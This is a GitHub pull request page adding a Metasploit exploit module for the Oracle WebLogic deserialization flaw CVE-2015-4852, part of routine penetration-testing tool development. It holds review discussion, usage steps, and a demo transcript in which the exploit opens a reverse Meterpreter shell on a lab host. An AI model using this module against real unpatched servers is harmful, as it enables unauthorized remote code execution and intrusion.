Add Weblogic_serialize_rawobject CVE-2015-4852 #11131

Merged
merged 11 commits into from
Mar 26, 2019


acamro (Contributor) commented Dec 16, 2018

Hi everyone,
Please add this exploit module for CVE-2015-4852, the Oracle WebLogic deserialization vulnerability.
It was tested on Windows 7 x64 with Oracle WebLogic Server v10.3.6.0 and v12.1.3.0.

TODO

  • Test on Linux
  • Test on Solaris
  • Improve the documentation

DEMO

 msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rhost 192.168.192.6
 rhost => 192.168.192.6
 msf exploit(multi/misc/weblogic_deserialize_rawobject) > set rport 7001
 rport => 7001
 msf exploit(multi/misc/weblogic_deserialize_rawobject) > exploit
 [*] Started reverse TCP handler on 192.168.192.136:4444 
 [*] 192.168.192.6:7001 - Sending handshake...
 [*] 192.168.192.6:7001 - Sending T3 request object...
 [*] 192.168.192.6:7001 - Sending client object payload...
 [*] Sending stage (179779 bytes) to 192.168.192.6
 [*] Meterpreter session 7 opened (192.168.192.136:4444 -> 192.168.192.6:49266) at 2018-12-14 11:40:29 -0800
 
 meterpreter > sysinfo
 Computer        : GIOTTO-HS-W7
 OS              : Windows 7 (Build 7600).
 Architecture    : x64
 System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/windows

Verification

  • Start msfconsole
  • use exploit/multi/misc/weblogic_deserialize_rawobject
  • set rhost
  • set rport
  • exploit
  • Enjoy!!!

bcoles and others added 4 commits December 15, 2018 23:23
Co-Authored-By: acamro <acamro@users.noreply.github.com>
Co-Authored-By: acamro <acamro@users.noreply.github.com>
…rawobject.md

Co-Authored-By: acamro <acamro@users.noreply.github.com>
bcoles (Contributor) commented Dec 16, 2018

There's currently a PR #11125 open to deal with automatically generating YSOserial payloads. Unfortunately I'm not sure if it will land any time soon.

Generally, in instances where there's giant blobs of serialized data, it's nice to have accompanying comments which describe the commands used to generate the blob.

acamro (Contributor, Author) commented Dec 16, 2018

> There's currently a PR #11125 open to deal with automatically generating YSOserial payloads. Unfortunately I'm not sure if it will land any time soon.
>
> Generally, in instances where there's giant blobs of serialized data, it's nice to have accompanying comments which describe the commands used to generate the blob.

I've added additional comments to the serialized blobs for clarity.
I'll be aware of any other improvements. I'm going to update the other PR soon...
Thanks for your support, @bcoles

wchen-r7 (Contributor) commented

@bcoles @acamro PR #11125 has been having some issues so it won't be a blocker for this PR.

asoto-r7 (Contributor) commented

@acamro: Please see my comment in the other PR: #11134 (comment). Thanks!!

asoto-r7 merged commit 0f9a796 into rapid7:master on Mar 26, 2019
asoto-r7 (Contributor) commented Mar 26, 2019

Release Notes

The multi/misc/weblogic_deserialize_rawobject exploit module has been added to the framework. This exploit leverages a JSO deserialization vulnerability against Oracle WebLogic v10.3.6.0 and v12.1.3.0.

asoto-r7 added a commit to asoto-r7/metasploit-framework that referenced this pull request Mar 26, 2019
While landing PR rapid7#11131, I overwrote weblogic_deserialize_rawobject.rb with
weblogic_deserialize_unicastref.rb, destroying my changes and introducing
a great deal of confusion.
asoto-r7 added a commit to asoto-r7/metasploit-framework that referenced this pull request Mar 26, 2019
While landing PR rapid7#11131, I tripped over my own shoelaces and overwrote `weblogic_deserialize_rawobject.rb` with `weblogic_deserialize_unicastref.rb`, destroying my changes and introducing a great deal of confusion.

This PR gets us back to where we should have been, with rapid7#11131 landed and a few changes to add randomization and expand on the T3 protocol.
gdavidson-r7 added rn-new-modules rn-modules (release notes for new or majorly enhanced modules) labels Apr 2, 2019
Labels
docs module rn-modules release notes for new or majorly enhanced modules